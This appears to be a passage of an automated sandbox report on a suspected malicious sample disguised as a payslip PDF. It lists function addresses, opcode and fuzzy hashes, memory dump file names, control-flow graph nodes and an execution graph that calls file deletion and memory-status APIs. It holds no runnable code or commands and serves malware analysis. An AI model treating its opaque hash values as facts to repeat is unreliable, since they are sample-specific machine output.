                                              • Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                              • Instruction Fuzzy Hash: 3E21B176904240DFDB06CF50D9C4B16BF72FB88324F24C5A9DD490B656C33AD82ADBA2
                                              Function 00F4D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032938344.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f4d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: 8c969707101c61e3787adab930b2f0c3d80831bc52722e1044afa3f6fb63c16e
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: BB11BB75904280DFCB06CF10C9C4B15BFA1FB84324F24C6A9DC494B296C37AD80ADB62
                                              Function 00F3D745 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032913162.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f3d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f8d4737c7a28fac7fcde408f17bb892f4df1a100bb2e554986df290762d1732
                                              • Instruction ID: acbc638aa6b1cab634dc449c19dcf984fdc58e2d430df18081dd3228733fc5a6
                                              • Opcode Fuzzy Hash: 0f8d4737c7a28fac7fcde408f17bb892f4df1a100bb2e554986df290762d1732
                                              • Instruction Fuzzy Hash: 03014E32404340DAE7208F25DD84B67FF9CEF45374F18C52AED080B286D2399C00DA71
                                              Function 00F3D744 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032913162.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f3d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16086110c06de2c5f470cea69895419e4c0a26f73166377c0601a35e10fc0b27
                                              • Instruction ID: 9ad41798b99f694c355a0c86d050a8f5fbbb2282e2dc4503a40a4ef24eb45bc2
                                              • Opcode Fuzzy Hash: 16086110c06de2c5f470cea69895419e4c0a26f73166377c0601a35e10fc0b27
                                              • Instruction Fuzzy Hash: DFF0F6714043449EE7108E16DC88B62FF9CEF95334F18C45AED480B386C2799C40CBB1

                                              Non-executed Functions

                                              Function 06D17300 Relevance: .3, Instructions: 321COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d7dffb32acf2d387fd48b1b76944c1bf70f734c5cf5f40514eb12e9d82b2445
                                              • Instruction ID: 96f0fc02a784239e3cf054d202e8cf4cbd376f92b6e2cf047a184c40e63cfd74
                                              • Opcode Fuzzy Hash: 1d7dffb32acf2d387fd48b1b76944c1bf70f734c5cf5f40514eb12e9d82b2445
                                              • Instruction Fuzzy Hash: C2E13B74E041199FDB54DFA8D5809AEFBF2FF88305F24816AD415AB36AD730A941CFA0
                                              Function 06D185B0 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 335b34c8059f911f2bf80fc25f02213310e6611847c4c5be6dc60c88cd5fda5a
                                              • Instruction ID: 07d0b9ae9aa09521075c689bbc9ecae4e6aeb414e92b1659c72dfbbe80cead04
                                              • Opcode Fuzzy Hash: 335b34c8059f911f2bf80fc25f02213310e6611847c4c5be6dc60c88cd5fda5a
                                              • Instruction Fuzzy Hash: D9E12C74E141199FCB14DFA8D5809AEFBF2FF89305F24816AE405AB35AD730A941CFA1
                                              Function 06D19548 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96d775868b02d9c97c48a1ea11e9a911e17c830f6cd955258e6e6ea7d7e3ff46
                                              • Instruction ID: 3a7540914586515369cd81583de7f989277ad69d789aba07c70fa662e1bf72ae
                                              • Opcode Fuzzy Hash: 96d775868b02d9c97c48a1ea11e9a911e17c830f6cd955258e6e6ea7d7e3ff46
                                              • Instruction Fuzzy Hash: 20E13B74E041199FCB14DFA8D5909AEFBF2FF89305F24816AE415AB35AC770A941CFA0
                                              Function 06D16ED8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78d4124e87f2e8e56ade74242dca4fa6201a20b9ad9a7858cefb59aca8916f7e
                                              • Instruction ID: e8d1d8bced727d0106156338bb098a22299253390c64f3e49ae2c0bc93548e22
                                              • Opcode Fuzzy Hash: 78d4124e87f2e8e56ade74242dca4fa6201a20b9ad9a7858cefb59aca8916f7e
                                              • Instruction Fuzzy Hash: AEE14D74E002199FCB14DFA9D5809AEFBF2FF89305F248169E414AB35AD771A941CFA0
                                              Function 06D189E8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cb454b5530dc725ac804844f166e0c135d40612ecbe9b479dd9cd92f1af39f6
                                              • Instruction ID: 21670ed8db497fc371a78bc3dda4bdb0477dc22ac8e3f4d1997e0e12b0dc2077
                                              • Opcode Fuzzy Hash: 9cb454b5530dc725ac804844f166e0c135d40612ecbe9b479dd9cd92f1af39f6
                                              • Instruction Fuzzy Hash: E5E11D74E041199FCB14DFA8D5809AEFBF2FF89305F24816AD405AB35AD770A941CFA1
                                              Function 0274DBDC Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f40158d21206930adec0b7a1441706052a278042582636adc40246a656b54243
                                              • Instruction ID: e7238931d4f0b907dcac1f2bea4ad104998382287bf5deffe3477f348e35e238
                                              • Opcode Fuzzy Hash: f40158d21206930adec0b7a1441706052a278042582636adc40246a656b54243
                                              • Instruction Fuzzy Hash: 82A17B32E002198FCF1ADFB5C9845AEB7B2FF84301B15856AE805AB265DF75EA15CF40
                                              Function 06D10A28 Relevance: .2, Instructions: 169COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 096dc3c55af08e87e93f7407e5bec56f0c6fcba9f722bfaa9f724f1893ff3cb0
                                              • Instruction ID: 674ee5623bad1bb467f9434138400db297fcaaaeb06d60d612d615fdd7caf6ac
                                              • Opcode Fuzzy Hash: 096dc3c55af08e87e93f7407e5bec56f0c6fcba9f722bfaa9f724f1893ff3cb0
                                              • Instruction Fuzzy Hash: 8F716E74E012199FDB44DFAAD98499EFBF2BF88310F14D16AD418AB315DB34A982CF50
                                              Function 06D10798 Relevance: .1, Instructions: 140COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aadb77fbf79aa66179fca514fa0a35ece5ea6b6e8d85487e855f24ee447368a5
                                              • Instruction ID: 7c57c08acd7dd352f1d2d4c661e076893067fc723a683a83be9e05bc5d859c61
                                              • Opcode Fuzzy Hash: aadb77fbf79aa66179fca514fa0a35ece5ea6b6e8d85487e855f24ee447368a5
                                              • Instruction Fuzzy Hash: AD519175D012199FDB08DFEAD8446EEBBB2FF88301F10802AE519AB254DB745946CF50
                                              Function 06D19538 Relevance: .1, Instructions: 140COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 082fb5d97777048e14627cdc59374d2d25bdd537ab0bf66fa7f9bb1ece5eb030
                                              • Instruction ID: 3a1c4079ec6c3249f105d64bc564fcb626f0ab800270b5a9036680e90c8af340
                                              • Opcode Fuzzy Hash: 082fb5d97777048e14627cdc59374d2d25bdd537ab0bf66fa7f9bb1ece5eb030
                                              • Instruction Fuzzy Hash: B2513874E042198FDB14CFA9D9905AEFBF2FF89305F24C16AD418AB256D7709A41CFA0
                                              Function 06D1859F Relevance: .1, Instructions: 135COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad7f1bd786d1a53c4880733bf03ddd97d04d0f9b064436c417e0f4a2aa0b161a
                                              • Instruction ID: 1a28a9459f32b4317c4bdcab2e2aff5abf215f052d9b4ad05a7b096f94e76b4f
                                              • Opcode Fuzzy Hash: ad7f1bd786d1a53c4880733bf03ddd97d04d0f9b064436c417e0f4a2aa0b161a
                                              • Instruction Fuzzy Hash: 6A510C74E142198FDB14CFA9D9805AEFBF2FF89305F24C16AD408AB256D7319941CFA1
                                              Function 06D10A17 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3712e6125f909f99e0589ac88eaf78614ff45f28b20f849302f465506cdb5aa4
                                              • Instruction ID: 0a7bd12d349ffe702344503c80a2f7313dd2461f4142c2fd9a1f02d089daed55
                                              • Opcode Fuzzy Hash: 3712e6125f909f99e0589ac88eaf78614ff45f28b20f849302f465506cdb5aa4
                                              • Instruction Fuzzy Hash: 7F51B074E006198FDB48DFAAC98469EFBF2BF88300F14C06AE418AB355DB349946CB50
                                              Function 06D10789 Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 687add2de3ba2b4d6970018f087689c22c1b9ff4fe521a354e361ab4faaf69c7
                                              • Instruction ID: 50afa3c881518f82c78521df4c562a1f9eb52d974c7a72cabe9c081a44f90b12
                                              • Opcode Fuzzy Hash: 687add2de3ba2b4d6970018f087689c22c1b9ff4fe521a354e361ab4faaf69c7
                                              • Instruction Fuzzy Hash: 4541B371E046599FDB08DFEAD8846AEFBF2AF89300F14C06AD418AB255DB745946CF40
                                              Function 06D1B06B Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89fe257eacadf7bd9766f73dee7b3b089ae8cf6d3bdfe4b005c0263088ac9108
                                              • Instruction ID: 35068420940b49822e28f1186a70dc2d01d8c3ede2803c8a9f6940681865767d
                                              • Opcode Fuzzy Hash: 89fe257eacadf7bd9766f73dee7b3b089ae8cf6d3bdfe4b005c0263088ac9108
                                              • Instruction Fuzzy Hash: 8DC04C36D8D109FA9B904D8478050F8F73CDEDF572F013057D28EAA5014690C65585C4

                                              Execution Graph

                                              Execution Coverage:14.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:28
                                              Total number of Limit Nodes:6
                                              execution_graph 26154 1090848 26156 109084e 26154->26156 26155 109091b 26156->26155 26159 1091458 26156->26159 26165 1091340 26156->26165 26160 109145f 26159->26160 26162 1091356 26159->26162 26160->26156 26161 1091454 26161->26156 26162->26161 26164 1091458 2 API calls 26162->26164 26171 1098219 26162->26171 26164->26162 26166 1091303 26165->26166 26168 1091343 26165->26168 26166->26156 26167 1091454 26167->26156 26168->26167 26169 1098219 2 API calls 26168->26169 26170 1091458 2 API calls 26168->26170 26169->26168 26170->26168 26173 1098223 26171->26173 26172 10982d9 26172->26162 26173->26172 26176 684fa80 26173->26176 26180 684fa70 26173->26180 26177 684fa95 26176->26177 26178 684fca6 26177->26178 26179 684fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 26177->26179 26178->26172 26179->26177 26181 684fa95 26180->26181 26182 684fca6 26181->26182 26183 684fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 26181->26183 26182->26172 26183->26181 26184 1098040 26185 1098086 DeleteFileW 26184->26185 26187 10980bf 26185->26187

                                              Executed Functions

                                              Function 06843578 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 125 6843578-6843599 126 684359b-684359e 125->126 127 68435a4-68435c3 126->127 128 6843d3f-6843d42 126->128 138 68435c5-68435c8 127->138 139 68435dc-68435e6 127->139 129 6843d44-6843d63 128->129 130 6843d68-6843d6a 128->130 129->130 131 6843d71-6843d74 130->131 132 6843d6c 130->132 131->126 135 6843d7a-6843d83 131->135 132->131 138->139 140 68435ca-68435da 138->140 143 68435ec-68435fb 139->143 140->143 254 68435fd call 6843d92 143->254 255 68435fd call 6843d98 143->255 144 6843602-6843607 145 6843614-68438f1 144->145 146 6843609-684360f 144->146 167 68438f7-68439a6 145->167 168 6843d31-6843d3e 145->168 146->135 177 68439cf 167->177 178 68439a8-68439cd 167->178 180 68439d8-68439eb call 6842370 177->180 178->180 183 68439f1-6843a13 call 684237c 180->183 184 6843d18-6843d24 180->184 183->184 188 6843a19-6843a23 183->188 184->167 185 6843d2a 184->185 185->168 188->184 189 6843a29-6843a34 188->189 189->184 190 6843a3a-6843b10 189->190 202 6843b12-6843b14 190->202 203 6843b1e-6843b4e 190->203 202->203 207 6843b50-6843b52 203->207 208 6843b5c-6843b68 203->208 207->208 209 6843bc8-6843bcc 208->209 210 6843b6a-6843b6e 208->210 211 6843bd2-6843c0e 209->211 212 6843d09-6843d12 209->212 210->209 213 6843b70-6843b9a 210->213 224 6843c10-6843c12 211->224 225 6843c1c-6843c2a 211->225 212->184 212->190 220 6843b9c-6843b9e 213->220 221 6843ba8-6843bc5 call 6842388 213->221 220->221 221->209 224->225 228 6843c41-6843c4c 225->228 229 6843c2c-6843c37 225->229 233 6843c64-6843c75 228->233 234 6843c4e-6843c54 228->234 229->228 232 6843c39 229->232 232->228 238 6843c77-6843c7d 233->238 239 6843c8d-6843c99 233->239 235 6843c56 234->235 236 6843c58-6843c5a 234->236 235->233 236->233 240 6843c81-6843c83 238->240 241 6843c7f 238->241 243 6843cb1-6843d02 239->243 244 6843c9b-6843ca1 239->244 240->239 241->239 243->212 245 6843ca5-6843ca7 244->245 246 6843ca3 244->246 245->243 246->243 254->144 255->144
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: 8c9bb3adc7947200240f4a71570c6a877c12d6885690c69ab21a75d1e28dc05b
                                              • Instruction ID: 94817f39d2a9965aaebc6822b89c6225ad1d103a717ac69b11f2f8e16790016b
                                              • Opcode Fuzzy Hash: 8c9bb3adc7947200240f4a71570c6a877c12d6885690c69ab21a75d1e28dc05b
                                              • Instruction Fuzzy Hash: 7B324131E1071A8FCB15EF79C89469DB7B6FFD9300F50C66AD449A7224EB30A985CB90
                                              Function 06847E90 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 847 6847e90-6847eae 848 6847eb0-6847eb3 847->848 849 6847ed4-6847ed7 848->849 850 6847eb5-6847ecf 848->850 851 6847eee-6847ef1 849->851 852 6847ed9-6847ee7 849->852 850->849 854 6847f14-6847f17 851->854 855 6847ef3-6847f0f 851->855 863 6847f36-6847f4c 852->863 864 6847ee9 852->864 856 6847f24-6847f26 854->856 857 6847f19-6847f23 854->857 855->854 859 6847f2d-6847f30 856->859 860 6847f28 856->860 859->848 859->863 860->859 867 6848167-6848171 863->867 868 6847f52-6847f5b 863->868 864->851 869 6847f61-6847f7e 868->869 870 6848172-68481a7 868->870 877 6848154-6848161 869->877 878 6847f84-6847fac 869->878 873 68481a9-68481ac 870->873 875 68483e1-68483e4 873->875 876 68481b2-68481c1 873->876 879 68483e6-6848402 875->879 880 6848407-684840a 875->880 884 68481e0-6848224 876->884 885 68481c3-68481de 876->885 877->867 877->868 878->877 898 6847fb2-6847fbb 878->898 879->880 882 68484b5-68484b7 880->882 883 6848410-684841c 880->883 886 68484be-68484c1 882->886 887 68484b9 882->887 890 6848427-6848429 883->890 903 68483b5-68483cb 884->903 904 684822a-684823b 884->904 885->884 886->873 891 68484c7-68484d0 886->891 887->886 894 6848441-6848445 890->894 895 684842b-6848431 890->895 901 6848447-6848451 894->901 902 6848453 894->902 899 6848435-6848437 895->899 900 6848433 895->900 898->870 905 6847fc1-6847fdd 898->905 899->894 900->894 908 6848458-684845a 901->908 902->908 903->875 914 68483a0-68483af 904->914 915 6848241-684825e 904->915 917 6848142-684814e 905->917 918 6847fe3-684800d 905->918 909 684845c-684845f 908->909 910 684846b-68484a4 908->910 909->891 910->876 930 68484aa-68484b4 910->930 914->903 914->904 915->914 924 6848264-684835a call 68466b0 915->924 917->877 917->898 931 6848013-684803b 918->931 932 6848138-684813d 918->932 980 684835c-6848366 924->980 981 6848368 924->981 931->932 938 6848041-684806f 931->938 932->917 938->932 944 6848075-684807e 938->944 944->932 945 6848084-68480b6 944->945 953 68480c1-68480dd 945->953 954 68480b8-68480bc 945->954 953->917 955 68480df-6848136 call 68466b0 953->955 954->932 957 68480be 954->957 955->917 957->953 982 684836d-684836f 980->982 981->982 982->914 983 6848371-6848376 982->983 984 6848384 983->984 985 6848378-6848382 983->985 986 6848389-684838b 984->986 985->986 986->914 987 684838d-6848399 986->987 987->914
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: 66359b2de77dea25eb0d81206ee7667f7f5e3bc54d38c20b19e814c4c9d1b49f
                                              • Instruction ID: c053eea3740522911c36ae3976ca1405997a55c04c6452f0f477f5a34baba84c
                                              • Opcode Fuzzy Hash: 66359b2de77dea25eb0d81206ee7667f7f5e3bc54d38c20b19e814c4c9d1b49f
                                              • Instruction Fuzzy Hash: 9402A331B0020A8FDB58EF68D890AAEB7E6FF84314F148529D519DB354DB35ED46CB81
                                              Function 068456A8 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852
                                              • Opcode ID: e3c48ae65017009729203fb95e5f67d72e2221e1690e734368f5370f80cdf992
                                              • Instruction ID: 4aa78f93e2130174658425f301ac3e9be5ddf2d37b1680d884d1fca2525ea49c
                                              • Opcode Fuzzy Hash: e3c48ae65017009729203fb95e5f67d72e2221e1690e734368f5370f80cdf992
                                              • Instruction Fuzzy Hash: C222AF71E002198FDF64EFA4C4906AEBBB2FF84324F248469D559EB344DA35DD42CB92
                                              Function 06842710 Relevance: 1.1, Instructions: 1066COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e60e17e287f2228a5ad6f920a5adf886a8b0291254ee320f8bcb4236d19dd58
                                              • Instruction ID: fdf640d6dc1b17d2751c1a71f09a0ab0c09aa37311272419e045a5c944500e2f
                                              • Opcode Fuzzy Hash: 5e60e17e287f2228a5ad6f920a5adf886a8b0291254ee320f8bcb4236d19dd58
                                              • Instruction Fuzzy Hash: 1AA23234A002088FDB64EB68C594B9DBBF2FB49314F5584A9E509EB366DB35ED81CF40
                                              Function 06846700 Relevance: .8, Instructions: 815COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19eaccb1f837a38d6f997cf6366eaad9fa004c22f131a1ffc62f1f80bd4ecbce
                                              • Instruction ID: e3ef334b6991ab929b9c570e219efe67628885477ad702802d9cadc988d68150
                                              • Opcode Fuzzy Hash: 19eaccb1f837a38d6f997cf6366eaad9fa004c22f131a1ffc62f1f80bd4ecbce
                                              • Instruction Fuzzy Hash: B2628E34B002098FDB54EB68D590BADB7F6EF85314F248569E506EB354EB35EC86CB80
                                              Function 0684B342 Relevance: .6, Instructions: 568COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1adbc6f6ffa3debf183f69236a538bcef9e60499959c52e5ed369dc429b9cf5
                                              • Instruction ID: 080bb28a21ed54d75819cab26ca0eede4ba4fd9902e821e4b316e0c78f29c5e0
                                              • Opcode Fuzzy Hash: a1adbc6f6ffa3debf183f69236a538bcef9e60499959c52e5ed369dc429b9cf5
                                              • Instruction Fuzzy Hash: 2A226D30E1020D8FEF64EBA9D5907ADB7F6EB59310F248826E509EB395DA34DC81CB51
                                              Function 0684ADE0 Relevance: 10.4, Strings: 8, Instructions: 390COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 684ade0-684adfe 1 684ae00-684ae03 0->1 2 684ae05-684ae21 1->2 3 684ae26-684ae29 1->3 2->3 4 684affd-684b006 3->4 5 684ae2f-684ae32 3->5 8 684b00c-684b016 4->8 9 684ae89-684ae92 4->9 6 684ae34-684ae41 5->6 7 684ae46-684ae49 5->7 6->7 11 684ae5a-684ae5d 7->11 12 684ae4b-684ae4f 7->12 13 684b017-684b04e 9->13 14 684ae98-684ae9c 9->14 17 684ae67-684ae6a 11->17 18 684ae5f-684ae64 11->18 12->8 16 684ae55 12->16 28 684b050-684b053 13->28 20 684aea1-684aea4 14->20 16->11 23 684ae84-684ae87 17->23 24 684ae6c-684ae7f 17->24 18->17 21 684aeb4-684aeb6 20->21 22 684aea6-684aeaf 20->22 26 684aebd-684aec0 21->26 27 684aeb8 21->27 22->21 23->9 23->20 24->23 26->1 29 684aec6-684aeea 26->29 27->26 30 684b055-684b071 28->30 31 684b076-684b079 28->31 48 684aef0-684aeff 29->48 49 684affa 29->49 30->31 33 684b088-684b08b 31->33 34 684b07b call 684b342 31->34 35 684b08d-684b091 33->35 36 684b098-684b09b 33->36 42 684b081-684b083 34->42 39 684b0a1-684b0dc 35->39 40 684b093 35->40 36->39 41 684b304-684b307 36->41 52 684b0e2-684b0ee 39->52 53 684b2cf-684b2e2 39->53 40->36 44 684b314-684b316 41->44 45 684b309-684b313 41->45 42->33 50 684b31d-684b320 44->50 51 684b318 44->51 58 684af17-684af52 call 68466b0 48->58 59 684af01-684af07 48->59 49->4 50->28 54 684b326-684b330 50->54 51->50 61 684b0f0-684b109 52->61 62 684b10e-684b152 52->62 55 684b2e4 53->55 60 684b2e5 55->60 76 684af54-684af5a 58->76 77 684af6a-684af81 58->77 63 684af09 59->63 64 684af0b-684af0d 59->64 60->60 61->55 78 684b154-684b166 62->78 79 684b16e-684b1ad 62->79 63->58 64->58 80 684af5c 76->80 81 684af5e-684af60 76->81 88 684af83-684af89 77->88 89 684af99-684afaa 77->89 78->79 85 684b294-684b2a9 79->85 86 684b1b3-684b28e call 68466b0 79->86 80->77 81->77 85->53 86->85 93 684af8d-684af8f 88->93 94 684af8b 88->94 98 684afc2-684aff3 89->98 99 684afac-684afb2 89->99 93->89 94->89 98->49 100 684afb4 99->100 101 684afb6-684afb8 99->101 100->98 101->98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 12c8c0273b9db7e45497d6d77e94f70212d198e6c264762bb1909df26a7d6c10
                                              • Instruction ID: a508f0ecc1bb6d1447981949e85fa2d57b70452e53f4a13f517973144c8accbb
                                              • Opcode Fuzzy Hash: 12c8c0273b9db7e45497d6d77e94f70212d198e6c264762bb1909df26a7d6c10
